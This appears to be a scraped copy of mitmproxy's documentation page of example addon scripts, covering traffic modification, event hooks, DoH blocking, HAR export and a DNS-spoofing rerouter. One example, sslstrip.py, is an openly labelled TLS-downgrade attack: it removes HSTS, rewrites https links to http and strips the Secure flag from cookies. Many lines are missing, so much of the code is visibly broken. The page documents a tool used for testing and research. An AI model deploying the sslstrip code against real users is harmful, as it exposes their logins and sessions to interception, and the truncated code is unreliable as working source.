Edit on GitHub

#  Examples of Addons and Scripts

The most recent set of examples is also available on our GitHub project.

#  addons

#  Example: addons/addheader.py

class AddHeader:
    def __init__(self):
        self.num = 0

    def response(self, flow):
        self.num = self.num + 1
        flow.response.headers["count"] = str(self.num)

addons = [

#  Example: addons/anatomy.py

from mitmproxy import ctx

class Counter:
    def __init__(self):
        self.num = 0

    def request(self, flow):
        self.num = self.num + 1
        ctx.log.info("We've seen %d flows" % self.num)

addons = [

#  Example: addons/commands-flows.py

import typing

from mitmproxy import command
from mitmproxy import ctx
from mitmproxy import flow

class MyAddon:
    def __init__(self):
        self.num = 0

    def addheader(self, flows: typing.Sequence[flow.Flow]) -> None:
        for f in flows:
            f.request.headers["myheader"] = "value"

addons = [

#  Example: addons/commands-paths.py

import typing

from mitmproxy import command
from mitmproxy import ctx
from mitmproxy import flow
from mitmproxy import types

class MyAddon:
    def __init__(self):
        self.num = 0

    def histogram(
        flows: typing.Sequence[flow.Flow],
        path: types.Path,
    ) -> None:
        totals = {}
        for f in flows:
            totals[f.request.host] = totals.setdefault(f.request.host, 0) + 1

        with open(path, "w+") as fp:
            for cnt, dom in sorted([(v, k) for (k, v) in totals.items()]):
                fp.write("%s: %s\n" % (cnt, dom))


addons = [

#  Example: addons/commands-simple.py

from mitmproxy import command
from mitmproxy import ctx

class MyAddon:
    def __init__(self):
        self.num = 0

    def inc(self) -> None:
        self.num += 1
        ctx.log.info("num = %s" % self.num)

addons = [

#  Example: addons/events-http-specific.py

import mitmproxy.http

class Events:
    # HTTP lifecycle
    def http_connect(self, flow: mitmproxy.http.HTTPFlow):
            An HTTP CONNECT request was received. Setting a non 2xx response on
            the flow will return the response to the client abort the
            connection. CONNECT requests and responses do not generate the usual
            HTTP handler events. CONNECT requests are only valid in regular and
            upstream proxy modes.

    def requestheaders(self, flow: mitmproxy.http.HTTPFlow):
            HTTP request headers were successfully read. At this point, the body
            is empty.

    def request(self, flow: mitmproxy.http.HTTPFlow):
            The full HTTP request has been read.

    def responseheaders(self, flow: mitmproxy.http.HTTPFlow):
            HTTP response headers were successfully read. At this point, the body
            is empty.

    def response(self, flow: mitmproxy.http.HTTPFlow):
            The full HTTP response has been read.

    def error(self, flow: mitmproxy.http.HTTPFlow):
            An HTTP error has occurred, e.g. invalid server responses, or
            interrupted connections. This is distinct from a valid server HTTP
            error response, which is simply a response with an HTTP error code.

#  Example: addons/events-tcp-specific.py

import mitmproxy.tcp

class Events:
    # TCP lifecycle
    def tcp_start(self, flow: mitmproxy.tcp.TCPFlow):
            A TCP connection has started.

    def tcp_message(self, flow: mitmproxy.tcp.TCPFlow):
            A TCP connection has received a message. The most recent message
            will be flow.messages[-1]. The message is user-modifiable.

    def tcp_error(self, flow: mitmproxy.tcp.TCPFlow):
            A TCP error has occurred.

    def tcp_end(self, flow: mitmproxy.tcp.TCPFlow):
            A TCP connection has ended.

#  Example: addons/events-websocket-specific.py

import mitmproxy.http
import mitmproxy.websocket

class Events:
    # Websocket lifecycle
    def websocket_handshake(self, flow: mitmproxy.http.HTTPFlow):
            Called when a client wants to establish a WebSocket connection. The
            WebSocket-specific headers can be manipulated to alter the
            handshake. The flow object is guaranteed to have a non-None request

    def websocket_start(self, flow: mitmproxy.websocket.WebSocketFlow):
            A websocket connection has commenced.

    def websocket_message(self, flow: mitmproxy.websocket.WebSocketFlow):
            Called when a WebSocket message is received from the client or
            server. The most recent message will be flow.messages[-1]. The
            message is user-modifiable. Currently there are two types of
            messages, corresponding to the BINARY and TEXT frame types.

    def websocket_error(self, flow: mitmproxy.websocket.WebSocketFlow):
            A websocket connection has had an error.

    def websocket_end(self, flow: mitmproxy.websocket.WebSocketFlow):
            A websocket connection has ended.

#  Example: addons/events.py

import typing

import mitmproxy.addonmanager
import mitmproxy.connections
import mitmproxy.http
import mitmproxy.log
import mitmproxy.tcp
import mitmproxy.websocket
import mitmproxy.proxy.protocol

class Events:
    # Network lifecycle
    def clientconnect(self, layer: mitmproxy.proxy.protocol.Layer):
            A client has connected to mitmproxy. Note that a connection can
            correspond to multiple HTTP requests.

    def clientdisconnect(self, layer: mitmproxy.proxy.protocol.Layer):
            A client has disconnected from mitmproxy.

    def serverconnect(self, conn: mitmproxy.connections.ServerConnection):
            Mitmproxy has connected to a server. Note that a connection can
            correspond to multiple requests.

    def serverdisconnect(self, conn: mitmproxy.connections.ServerConnection):
            Mitmproxy has disconnected from a server.

    def next_layer(self, layer: mitmproxy.proxy.protocol.Layer):
            Network layers are being switched. You may change which layer will
            be used by returning a new layer object from this event.

    # General lifecycle
    def configure(self, updated: typing.Set[str]):
            Called when configuration changes. The updated argument is a
            set-like object containing the keys of all changed options. This
            event is called during startup with all options in the updated set.

    def done(self):
            Called when the addon shuts down, either by being removed from
            the mitmproxy instance, or when mitmproxy itself shuts down. On
            shutdown, this event is called after the event loop is
            terminated, guaranteeing that it will be the final event an addon
            sees. Note that log handlers are shut down at this point, so
            calls to log functions will produce no output.

    def load(self, entry: mitmproxy.addonmanager.Loader):
            Called when an addon is first loaded. This event receives a Loader
            object, which contains methods for adding options and commands. This
            method is where the addon configures itself.

    def log(self, entry: mitmproxy.log.LogEntry):
            Called whenever a new log entry is created through the mitmproxy
            context. Be careful not to log from this event, which will cause an
            infinite loop!

    def running(self):
            Called when the proxy is completely up and running. At this point,
            you can expect the proxy to be bound to a port, and all addons to be

    def update(self, flows: typing.Sequence[mitmproxy.flow.Flow]):
            Update is called when one or more flow objects have been modified,
            usually from a different addon.

#  Example: addons/options-configure.py

import typing

from mitmproxy import ctx
from mitmproxy import exceptions

class AddHeader:
    def load(self, loader):
            name = "addheader",
            typespec = typing.Optional[int],
            default = None,
            help = "Add a header to responses",

    def configure(self, updates):
        if "addheader" in updates:
            if ctx.options.addheader is not None and ctx.options.addheader > 100:
                raise exceptions.OptionsError("addheader must be <= 100")

    def response(self, flow):
        if ctx.options.addheader is not None:
            flow.response.headers["addheader"] = str(ctx.options.addheader)

addons = [

#  Example: addons/options-simple.py

from mitmproxy import ctx

class AddHeader:
    def __init__(self):
        self.num = 0

    def load(self, loader):
            name = "addheader",
            typespec = bool,
            default = False,
            help = "Add a count header to responses",

    def response(self, flow):
        if ctx.options.addheader:
            self.num = self.num + 1
            flow.response.headers["count"] = str(self.num)

addons = [

#  Example: addons/scripting-headers.py

def request(flow):
    flow.request.headers["myheader"] = "value"

#  complex

#  Example: complex/block_dns_over_https.py

This module is for blocking DNS over HTTPS requests.

It loads a blocklist of IPs and hostnames that are known to serve DNS over HTTPS requests.
It also uses headers, query params, and paths to detect DoH (and block it)
from typing import List

from mitmproxy import ctx

# known DoH providers' hostnames and IP addresses to block
default_blocklist: dict = {
    "hostnames": [
        "dns.adguard.com", "dns-family.adguard.com", "dns.google", "cloudflare-dns.com",
        "mozilla.cloudflare-dns.com", "security.cloudflare-dns.com", "family.cloudflare-dns.com",
        "dns.quad9.net", "dns9.quad9.net", "dns10.quad9.net", "dns11.quad9.net", "doh.opendns.com",
        "doh.familyshield.opendns.com", "doh.cleanbrowsing.org", "doh.xfinity.com", "dohdot.coxlab.net",
        "odvr.nic.cz", "doh.dnslify.com", "dns.nextdns.io", "dns.dnsoverhttps.net", "doh.crypto.sx",
        "doh.powerdns.org", "doh-fi.blahdns.com", "doh-jp.blahdns.com", "doh-de.blahdns.com",
        "doh.ffmuc.net", "dns.dns-over-https.com", "doh.securedns.eu", "dns.rubyfish.cn",
        "dns.containerpi.com", "dns.containerpi.com", "dns.containerpi.com", "doh-2.seby.io",
        "doh.seby.io", "commons.host", "doh.dnswarden.com", "doh.dnswarden.com", "doh.dnswarden.com",
        "dns-nyc.aaflalo.me", "dns.aaflalo.me", "doh.applied-privacy.net", "doh.captnemo.in",
        "doh.tiar.app", "doh.tiarap.org", "doh.dns.sb", "rdns.faelix.net", "doh.li", "doh.armadillodns.net",
        "jp.tiar.app", "jp.tiarap.org", "doh.42l.fr", "dns.hostux.net", "dns.hostux.net", "dns.aa.net.uk",
        "adblock.mydns.network", "ibksturm.synology.me", "jcdns.fun", "ibuki.cgnat.net", "dns.twnic.tw",
        "example.doh.blockerdns.com", "dns.digitale-gesellschaft.ch", "doh.libredns.gr",
        "doh.centraleu.pi-dns.com", "doh.northeu.pi-dns.com", "doh.westus.pi-dns.com",
        "doh.eastus.pi-dns.com", "dns.flatuslifir.is", "private.canadianshield.cira.ca",
        "protected.canadianshield.cira.ca", "family.canadianshield.cira.ca", "dns.google.com",
    "ips": [
        "", "", "", "", "",
        "", "", "", "", "",
        "", "", "", "", "",
        "", "", "", "", "",
        "", "", "", "", "",
        "", "", "", "", "",
        "", "", "", "", "",
        "", "", "", "", "",
        "", "", "", "", "",
        "", "", "", "", "",
        "", "", "", "", "",
        "", "", "", "", "",
        "", "", "", "", "2001:148f:fffe::1",
        "2001:19f0:7001:3259:5400:2ff:fe71:bc9", "2001:19f0:7001:5554:5400:2ff:fe57:3077",
        "2001:19f0:7001:5554:5400:2ff:fe57:3077", "2001:19f0:7001:5554:5400:2ff:fe57:3077",
        "2001:4860:4860::8844", "2001:4860:4860::8888",
        "2001:4b98:dc2:43:216:3eff:fe86:1d28", "2001:558:fe21:6b:96:113:151:149",
        "2001:608:a01::3", "2001:678:888:69:c45d:2738:c3f2:1878", "2001:8b0::2022", "2001:8b0::2023",
        "2001:c50:ffff:1:101:101:101:101", "", "", "",
        "2400:6180:0:d0::5f73:4001", "2400:8902::f03c:91ff:feda:c514", "2604:180:f3::42",
        "2604:a880:1:20::51:f001", "2606:4700::6810:f8f9", "2606:4700::6810:f9f9", "2606:4700::6812:1a80",
        "2606:4700::6812:1b80", "2606:4700::6812:237", "2606:4700::6812:337", "2606:4700:3033::6812:2ccc",
        "2606:4700:3033::6812:2dcc", "2606:4700:3033::6818:7b35", "2606:4700:3034::681c:16a",
        "2606:4700:3035::6818:7a35", "2606:4700:3035::681f:5a8a", "2606:4700:3036::681c:6a",
        "2606:4700:3036::681f:5b8a", "2606:4700:60:0:a71e:6467:cef8:2a56", "2620:10a:80bb::10",
        "2620:10a:80bb::20", "2620:10a:80bb::30" "2620:10a:80bc::10", "2620:10a:80bc::20",
        "2620:10a:80bc::30", "2620:119:fc::2", "2620:119:fc::3", "2620:fe::10", "2620:fe::11",
        "2620:fe::9", "2620:fe::fe:10", "2620:fe::fe:11", "2620:fe::fe:9", "2620:fe::fe",
        "2a00:5a60::ad1:ff", "2a00:5a60::ad2:ff", "2a00:5a60::bad1:ff", "2a00:5a60::bad2:ff",
        "2a00:d880:5:bf0::7c93", "2a01:4f8:1c0c:8233::1", "2a01:4f8:1c1c:6b4b::1", "2a01:4f8:c2c:52bf::1",
        "2a01:4f9:c010:43ce::1", "2a01:4f9:c01f:4::abcd", "2a01:7c8:d002:1ef:5054:ff:fe40:3703",
        "2a01:9e00::54", "2a01:9e00::55", "2a01:9e01::54", "2a01:9e01::55",
        "2a02:1205:34d5:5070:b26e:bfff:fe1d:e19b", "2a03:4000:38:53c::2",
        "2a03:b0c0:0:1010::e9a:3001", "2a04:bdc7:100:70::abcd", "2a05:fc84::42", "2a05:fc84::43",
        "2a07:a8c0::", "2a0d:4d00:81::1", "2a0d:5600:33:3::abcd", "", "",
        "", "", "", "", "",
        "", "", "", "", "",
        "", "", "", "", "", "",
        "", "", "", "",

# additional hostnames to block
additional_doh_names: List[str] = [

# additional IPs to block
additional_doh_ips: List[str] = [


doh_hostnames, doh_ips = default_blocklist['hostnames'], default_blocklist['ips']

# convert to sets for faster lookups
doh_hostnames = set(doh_hostnames)
doh_ips = set(doh_ips)

def _has_dns_message_content_type(flow):
    Check if HTTP request has a DNS-looking 'Content-Type' header

    :param flow: mitmproxy flow
    :return: True if 'Content-Type' header is DNS-looking, False otherwise
    doh_content_types = ['application/dns-message']
    if 'Content-Type' in flow.request.headers:
        if flow.request.headers['Content-Type'] in doh_content_types:
            return True
    return False

def _request_has_dns_query_string(flow):
    Check if the query string of a request contains the parameter 'dns'

    :param flow: mitmproxy flow
    :return: True is 'dns' is a parameter in the query string, False otherwise
    return 'dns' in flow.request.query

def _request_is_dns_json(flow):
    Check if the request looks like DoH with JSON.

    The only known implementations of DoH with JSON are Cloudflare and Google.

    For more info, see:
    - https://developers.cloudflare.com/
    - https://developers.google.com/speed/public-dns/docs/doh/json

    :param flow: mitmproxy flow
    :return: True is request looks like DNS JSON, False otherwise
    # Header 'Accept: application/dns-json' is required in Cloudflare's DoH JSON API
    # or they return a 400 HTTP response code
    if 'Accept' in flow.request.headers:
        if flow.request.headers['Accept'] == 'application/dns-json':
            return True
    # Google's DoH JSON API is https://dns.google/resolve
    path = flow.request.path.split('?')[0]
    if flow.request.host == 'dns.google' and path == '/resolve':
        return True
    return False

def _request_has_doh_looking_path(flow):
    Check if the path looks like it's DoH.
    Most common one is '/dns-query', likely because that's what's in the RFC

    :param flow: mitmproxy flow
    :return: True if path looks like it's DoH, otherwise False
    doh_paths = [
        '/dns-query',       # used in example in RFC 8484 (see https://tools.ietf.org/html/rfc8484#section-4.1.1)
    path = flow.request.path.split('?')[0]
    return path in doh_paths

def _requested_hostname_is_in_doh_blacklist(flow):
    Check if server hostname is in our DoH provider blacklist.

    The current blacklist is taken from https://github.com/curl/curl/wiki/DNS-over-HTTPS.

    :param flow: mitmproxy flow
    :return: True if server's hostname is in DoH blacklist, otherwise False
    hostname = flow.request.host
    ip = flow.server_conn.address
    return hostname in doh_hostnames or hostname in doh_ips or ip in doh_ips

doh_request_detection_checks = [

def request(flow):
    for check in doh_request_detection_checks:
        is_doh = check(flow)
        if is_doh:
            ctx.log.warn("[DoH Detection] DNS over HTTPS request detected via method \"%s\"" % check.__name__)

#  Example: complex/change_upstream_proxy.py

from mitmproxy import http
import typing

# This scripts demonstrates how mitmproxy can switch to a second/different upstream proxy
# in upstream proxy mode.
# Usage: mitmdump -U http://default-upstream-proxy.local:8080/ -s change_upstream_proxy.py
# If you want to change the target server, you should modify flow.request.host and flow.request.port

def proxy_address(flow: http.HTTPFlow) -> typing.Tuple[str, int]:
    # Poor man's loadbalancing: route every second domain through the alternative proxy.
    if hash(flow.request.host) % 2 == 1:
        return ("localhost", 8082)
        return ("localhost", 8081)

def request(flow: http.HTTPFlow) -> None:
    if flow.request.method == "CONNECT":
        # If the decision is done by domain, one could also modify the server address here.
        # We do it after CONNECT here to have the request data available as well.
    address = proxy_address(flow)
    if flow.live:
        flow.live.change_upstream_proxy_server(address)  # type: ignore

#  Example: complex/dns_spoofing.py

This script makes it possible to use mitmproxy in scenarios where IP spoofing
has been used to redirect connections to mitmproxy. The way this works is that
we rely on either the TLS Server Name Indication (SNI) or the Host header of the
HTTP request. Of course, this is not foolproof - if an HTTPS connection comes
without SNI, we don't know the actual target and cannot construct a certificate
that looks valid. Similarly, if there's no Host header or a spoofed Host header,
we're out of luck as well. Using transparent mode is the better option most of
the time.

        -p 443
        -s dns_spoofing.py
        # Used as the target location if neither SNI nor host header are present.
        --mode reverse:http://example.com/
        # To avoid auto rewriting of host header by the reverse proxy target.
        --set keep_host_header
        -p 80
        --mode reverse:http://localhost:443/

    (Setting up a single proxy instance and using iptables to redirect to it
    works as well)
import re

# This regex extracts splits the host header into host and port.
# Handles the edge case of IPv6 addresses containing colons.
# https://bugzilla.mozilla.org/show_bug.cgi?id=45891
parse_host_header = re.compile(r"^(?P<host>[^:]+|\[.+\])(?::(?P<port>\d+))?$")

class Rerouter:
    def request(self, flow):
        if flow.client_conn.tls_established:
            flow.request.scheme = "https"
            sni = flow.client_conn.connection.get_servername()
            port = 443
            flow.request.scheme = "http"
            sni = None
            port = 80

        host_header = flow.request.host_header
        m = parse_host_header.match(host_header)
        if m:
            host_header = m.group("host").strip("[]")
            if m.group("port"):
                port = int(m.group("port"))

        flow.request.host_header = host_header
        flow.request.host = sni or host_header
        flow.request.port = port

addons = [Rerouter()]

#  Example: complex/dup_and_replay.py

from mitmproxy import ctx

def request(flow):
    # Avoid an infinite loop by not replaying already replayed requests
    if flow.request.is_replay:
    flow = flow.copy()
    # Only interactive tools have a view. If we have one, add a duplicate entry
    # for our flow.
    if "view" in ctx.master.addons:
        ctx.master.commands.call("view.flows.add", [flow])
    flow.request.path = "/changed"
    ctx.master.commands.call("replay.client", [flow])

#  Example: complex/har_dump.py

This inline script can be used to dump flows as HAR files.

example cmdline invocation:
mitmdump -s ./har_dump.py --set hardump=./dump.har

filename endwith '.zhar' will be compressed:
mitmdump -s ./har_dump.py --set hardump=./dump.zhar

import json
import base64
import zlib
import os
import typing  # noqa

from datetime import datetime
from datetime import timezone

import mitmproxy

from mitmproxy import connections  # noqa
from mitmproxy import version
from mitmproxy import ctx
from mitmproxy.utils import strutils
from mitmproxy.net.http import cookies

HAR: typing.Dict = {}

# A list of server seen till now is maintained so we can avoid
# using 'connect' time for entries that use an existing connection.
SERVERS_SEEN: typing.Set[connections.ServerConnection] = set()

def load(l):
        "hardump", str, "", "HAR dump path.",

def configure(updated):
        "log": {
            "version": "1.2",
            "creator": {
                "name": "mitmproxy har_dump",
                "version": "0.1",
                "comment": "mitmproxy version %s" % version.MITMPROXY
            "entries": []

def response(flow):
       Called when a server response has been received.

    # -1 indicates that these values do not apply to current request
    ssl_time = -1
    connect_time = -1

    if flow.server_conn and flow.server_conn not in SERVERS_SEEN:
        connect_time = (flow.server_conn.timestamp_tcp_setup -

        if flow.server_conn.timestamp_tls_setup is not None:
            ssl_time = (flow.server_conn.timestamp_tls_setup -


    # Calculate raw timings from timestamps. DNS timings can not be calculated
    # for lack of a way to measure it. The same goes for HAR blocked.
    # mitmproxy will open a server connection as soon as it receives the host
    # and port from the client connection. So, the time spent waiting is actually
    # spent waiting between request.timestamp_end and response.timestamp_start
    # thus it correlates to HAR wait instead.
    timings_raw = {
        'send': flow.request.timestamp_end - flow.request.timestamp_start,
        'receive': flow.response.timestamp_end - flow.response.timestamp_start,
        'wait': flow.response.timestamp_start - flow.request.timestamp_end,
        'connect': connect_time,
        'ssl': ssl_time,

    # HAR timings are integers in ms, so we re-encode the raw timings to that format.
    timings = {
        k: int(1000 * v) if v != -1 else -1
        for k, v in timings_raw.items()

    # full_time is the sum of all timings.
    # Timings set to -1 will be ignored as per spec.
    full_time = sum(v for v in timings.values() if v > -1)

    started_date_time = datetime.fromtimestamp(flow.request.timestamp_start, timezone.utc).isoformat()

    # Response body size and encoding
    response_body_size = len(flow.response.raw_content) if flow.response.raw_content else 0
    response_body_decoded_size = len(flow.response.content) if flow.response.content else 0
    response_body_compression = response_body_decoded_size - response_body_size

    entry = {
        "startedDateTime": started_date_time,
        "time": full_time,
        "request": {
            "method": flow.request.method,
            "url": flow.request.url,
            "httpVersion": flow.request.http_version,
            "cookies": format_request_cookies(flow.request.cookies.fields),
            "headers": name_value(flow.request.headers),
            "queryString": name_value(flow.request.query or {}),
            "headersSize": len(str(flow.request.headers)),
            "bodySize": len(flow.request.content),
        "response": {
            "status": flow.response.status_code,
            "statusText": flow.response.reason,
            "httpVersion": flow.response.http_version,
            "cookies": format_response_cookies(flow.response.cookies.fields),
            "headers": name_value(flow.response.headers),
            "content": {
                "size": response_body_size,
                "compression": response_body_compression,
                "mimeType": flow.response.headers.get('Content-Type', '')
            "redirectURL": flow.response.headers.get('Location', ''),
            "headersSize": len(str(flow.response.headers)),
            "bodySize": response_body_size,
        "cache": {},
        "timings": timings,

    # Store binary data as base64
    if strutils.is_mostly_bin(flow.response.content):
        entry["response"]["content"]["text"] = base64.b64encode(flow.response.content).decode()
        entry["response"]["content"]["encoding"] = "base64"
        entry["response"]["content"]["text"] = flow.response.get_text(strict=False)

    if flow.request.method in ["POST", "PUT", "PATCH"]:
        params = [
            {"name": a, "value": b}
            for a, b in flow.request.urlencoded_form.items(multi=True)
        entry["request"]["postData"] = {
            "mimeType": flow.request.headers.get("Content-Type", ""),
            "text": flow.request.get_text(strict=False),
            "params": params

    if flow.server_conn.connected():
        entry["serverIPAddress"] = str(flow.server_conn.ip_address[0])


def done():
        Called once on script shutdown, after any other events.
    if ctx.options.hardump:
        json_dump: str = json.dumps(HAR, indent=2)

        if ctx.options.hardump == '-':
            raw: bytes = json_dump.encode()
            if ctx.options.hardump.endswith('.zhar'):
                raw = zlib.compress(raw, 9)

            with open(os.path.expanduser(ctx.options.hardump), "wb") as f:

            mitmproxy.ctx.log("HAR dump finished (wrote %s bytes to file)" % len(json_dump))

def format_cookies(cookie_list):
    rv = []

    for name, value, attrs in cookie_list:
        cookie_har = {
            "name": name,
            "value": value,

        # HAR only needs some attributes
        for key in ["path", "domain", "comment"]:
            if key in attrs:
                cookie_har[key] = attrs[key]

        # These keys need to be boolean!
        for key in ["httpOnly", "secure"]:
            cookie_har[key] = bool(key in attrs)

        # Expiration time needs to be formatted
        expire_ts = cookies.get_expiration_ts(attrs)
        if expire_ts is not None:
            cookie_har["expires"] = datetime.fromtimestamp(expire_ts, timezone.utc).isoformat()


    return rv

def format_request_cookies(fields):
    return format_cookies(cookies.group_cookies(fields))

def format_response_cookies(fields):
    return format_cookies((c[0], c[1][0], c[1][1]) for c in fields)

def name_value(obj):
        Convert (key, value) pairs to HAR format.
    return [{"name": k, "value": v} for k, v in obj.items()]

#  Example: complex/mitmproxywrapper.py

#!/usr/bin/env python
# Helper tool to enable/disable OS X proxy and wrap mitmproxy
# Get usage information with:
# mitmproxywrapper.py -h

import subprocess
import re
import argparse
import contextlib
import os
import sys

class Wrapper:
    def __init__(self, port, extra_arguments=None):
        self.port = port
        self.extra_arguments = extra_arguments

    def run_networksetup_command(self, *arguments):
        return subprocess.check_output(
            ['sudo', 'networksetup'] + list(arguments))

    def proxy_state_for_service(self, service):
        state = self.run_networksetup_command(
        return dict([re.findall(r'([^:]+): (.*)', line)[0] for line in state])

    def enable_proxy_for_service(self, service):
        print('Enabling proxy on {}...'.format(service))
        for subcommand in ['-setwebproxy', '-setsecurewebproxy']:
                subcommand, service, '', str(

    def disable_proxy_for_service(self, service):
        print('Disabling proxy on {}...'.format(service))
        for subcommand in ['-setwebproxystate', '-setsecurewebproxystate']:
            self.run_networksetup_command(subcommand, service, 'Off')

    def interface_name_to_service_name_map(self):
        order = self.run_networksetup_command('-listnetworkserviceorder')
        mapping = re.findall(
            r'\(\d+\)\s(.*)$\n\(.*Device: (.+)\)$',
        return dict([(b, a) for (a, b) in mapping])

    def run_command_with_input(self, command, input):
        popen = subprocess.Popen(
        (stdout, stderr) = popen.communicate(input)
        return stdout

    def primary_interace_name(self):
        scutil_script = 'get State:/Network/Global/IPv4\nd.show\n'
        stdout = self.run_command_with_input('/usr/sbin/scutil', scutil_script)
        interface, = re.findall(r'PrimaryInterface\s*:\s*(.+)', stdout)
        return interface

    def primary_service_name(self):
        return self.interface_name_to_service_name_map()[

    def proxy_enabled_for_service(self, service):
        return self.proxy_state_for_service(service)['Enabled'] == 'Yes'

    def toggle_proxy(self):
        new_state = not self.proxy_enabled_for_service(
        for service_name in self.connected_service_names():
            if self.proxy_enabled_for_service(service_name) and not new_state:
            elif not self.proxy_enabled_for_service(service_name) and new_state:

    def connected_service_names(self):
        scutil_script = 'list\n'
        stdout = self.run_command_with_input('/usr/sbin/scutil', scutil_script)
        service_ids = re.findall(r'State:/Network/Service/(.+)/IPv4', stdout)

        service_names = []
        for service_id in service_ids:
            scutil_script = 'show Setup:/Network/Service/{}\n'.format(
            stdout = self.run_command_with_input(
            service_name, = re.findall(r'UserDefinedName\s*:\s*(.+)', stdout)

        return service_names

    def wrap_mitmproxy(self):
        with self.wrap_proxy():
            cmd = ['mitmproxy', '-p', str(self.port)]
            if self.extra_arguments:

    def wrap_honeyproxy(self):
        with self.wrap_proxy():
            popen = subprocess.Popen('honeyproxy.sh')
            except KeyboardInterrupt:

    def wrap_proxy(self):
        connected_service_names = self.connected_service_names()
        for service_name in connected_service_names:
            if not self.proxy_enabled_for_service(service_name):


        for service_name in connected_service_names:
            if self.proxy_enabled_for_service(service_name):

    def ensure_superuser(cls):
        if os.getuid() != 0:
            print('Relaunching with sudo...')
            os.execv('/usr/bin/sudo', ['/usr/bin/sudo'] + sys.argv)

    def main(cls):
        parser = argparse.ArgumentParser(
            description='Helper tool for OS X proxy configuration and mitmproxy.',
            epilog='Any additional arguments will be passed on unchanged to mitmproxy.')
            help='just toggle the proxy configuration')
        # parser.add_argument('--honeyproxy', action='store_true', help='run honeyproxy instead of mitmproxy')
            help='override the default port of 8080',
        args, extra_arguments = parser.parse_known_args()

        wrapper = cls(port=args.port, extra_arguments=extra_arguments)

        if args.toggle:
        # elif args.honeyproxy:
        #     wrapper.wrap_honeyproxy()

if __name__ == '__main__':

#  Example: complex/nonblocking.py

import time

from mitmproxy.script import concurrent

@concurrent  # Remove this and see what happens
def request(flow):
    # This is ugly in mitmproxy's UI, but you don't want to use mitmproxy.ctx.log from a different thread.
    print("handle request: %s%s" % (flow.request.host, flow.request.path))
    print("start  request: %s%s" % (flow.request.host, flow.request.path))

#  Example: complex/remote_debug.py

This script enables remote debugging of the mitmproxy *UI* with PyCharm.
For general debugging purposes, it is easier to just debug mitmdump within PyCharm.

    - pip install pydevd on the mitmproxy machine
    - Open the Run/Debug Configuration dialog box in PyCharm, and select the
      Python Remote Debug configuration type.
    - Debugging works in the way that mitmproxy connects to the debug server
      on startup. Specify host and port that mitmproxy can use to reach your
      PyCharm instance on startup.
    - Adjust this inline script accordingly.
    - Start debug server in PyCharm
    - Set breakpoints
    - Start mitmproxy -s remote_debug.py

def load(l):
    import pydevd_pycharm
    pydevd_pycharm.settrace("localhost", port=5678, stdoutToServer=True, stderrToServer=True, suspend=False)

#  Example: complex/sslstrip.py

This script implements an sslstrip-like attack based on mitmproxy.
import re
import urllib.parse
import typing  # noqa

from mitmproxy import http

# set of SSL/TLS capable hosts
secure_hosts: typing.Set[str] = set()

def request(flow: http.HTTPFlow) -> None:
    flow.request.headers.pop('If-Modified-Since', None)
    flow.request.headers.pop('Cache-Control', None)

    # do not force https redirection
    flow.request.headers.pop('Upgrade-Insecure-Requests', None)

    # proxy connections to SSL-enabled hosts
    if flow.request.pretty_host in secure_hosts:
        flow.request.scheme = 'https'
        flow.request.port = 443

        # We need to update the request destination to whatever is specified in the host header:
        # Having no TLS Server Name Indication from the client and just an IP address as request.host
        # in transparent mode, TLS server name certificate validation would fail.
        flow.request.host = flow.request.pretty_host

def response(flow: http.HTTPFlow) -> None:
    assert flow.response
    flow.response.headers.pop('Strict-Transport-Security', None)
    flow.response.headers.pop('Public-Key-Pins', None)

    # strip links in response body
    flow.response.content = flow.response.content.replace(b'https://', b'http://')

    # strip meta tag upgrade-insecure-requests in response body
    csp_meta_tag_pattern = br'<meta.*http-equiv=["\']Content-Security-Policy[\'"].*upgrade-insecure-requests.*?>'
    flow.response.content = re.sub(csp_meta_tag_pattern, b'', flow.response.content, flags=re.IGNORECASE)

    # strip links in 'Location' header
    if flow.response.headers.get('Location', '').startswith('https://'):
        location = flow.response.headers['Location']
        hostname = urllib.parse.urlparse(location).hostname
        if hostname:
        flow.response.headers['Location'] = location.replace('https://', 'http://', 1)

    # strip upgrade-insecure-requests in Content-Security-Policy header
    csp_header = flow.response.headers.get('Content-Security-Policy', '')
    if re.search('upgrade-insecure-requests', csp_header, flags=re.IGNORECASE):
        csp = flow.response.headers['Content-Security-Policy']
        new_header = re.sub(r'upgrade-insecure-requests[;\s]*', '', csp, flags=re.IGNORECASE)
        flow.response.headers['Content-Security-Policy'] = new_header

    # strip secure flag from 'Set-Cookie' headers
    cookies = flow.response.headers.get_all('Set-Cookie')
    cookies = [re.sub(r';\s*secure\s*', '', s) for s in cookies]
    flow.response.headers.set_all('Set-Cookie', cookies)

#  Example: complex/stream.py

def responseheaders(flow):
    Enables streaming for all responses.
    This is equivalent to passing `--set stream_large_bodies=1` to mitmproxy.
    flow.response.stream = True

#  Example: complex/stream_modify.py

This inline script modifies a streamed response.
If you do not need streaming, see the modify_response_body example.
Be aware that content replacement isn't trivial:
    - If the transfer encoding isn't chunked, you cannot simply change the content length.
    - If you want to replace all occurrences of "foobar", make sure to catch the cases
      where one chunk ends with [...]foo" and the next starts with "bar[...].

def modify(chunks):
    chunks is a generator that can be used to iterate over all chunks.
    for chunk in chunks:
        yield chunk.replace("foo", "bar")

def responseheaders(flow):
    flow.response.stream = modify

#  Example: complex/tcp_message.py

tcp_message Inline Script Hook API Demonstration

* modifies packets containing "foo" to "bar"
* prints various details for each packet.

example cmdline invocation:
mitmdump --rawtcp --tcp-host ".*" -s examples/complex/tcp_message.py
from mitmproxy.utils import strutils
from mitmproxy import ctx
from mitmproxy import tcp

def tcp_message(flow: tcp.TCPFlow):
    message = flow.messages[-1]
    old_content = message.content
    message.content = old_content.replace(b"foo", b"bar")

        "[tcp_message{}] from {} to {}:\n{}".format(
            " (modified)" if message.content != old_content else "",
            "client" if message.from_client else "server",
            "server" if message.from_client else "client",

#  Example: complex/tls_passthrough.py

This inline script allows conditional TLS Interception based
on a user-defined strategy.


    > mitmdump -s tls_passthrough.py

    1. curl --proxy http://localhost:8080 https://example.com --insecure
    // works - we'll also see the contents in mitmproxy

    2. curl --proxy http://localhost:8080 https://example.com --insecure
    // still works - we'll also see the contents in mitmproxy

    3. curl --proxy http://localhost:8080 https://example.com
    // fails with a certificate error, which we will also see in mitmproxy

    4. curl --proxy http://localhost:8080 https://example.com
    // works again, but mitmproxy does not intercept and we do *not* see the contents

Authors: Maximilian Hils, Matthew Tuusberg
import collections
import random

from enum import Enum

import mitmproxy
from mitmproxy import ctx
from mitmproxy.exceptions import TlsProtocolException
from mitmproxy.proxy.protocol import TlsLayer, RawTCPLayer

class InterceptionResult(Enum):
    success = True
    failure = False
    skipped = None

class _TlsStrategy:
    Abstract base class for interception strategies.

    def __init__(self):
        # A server_address -> interception results mapping
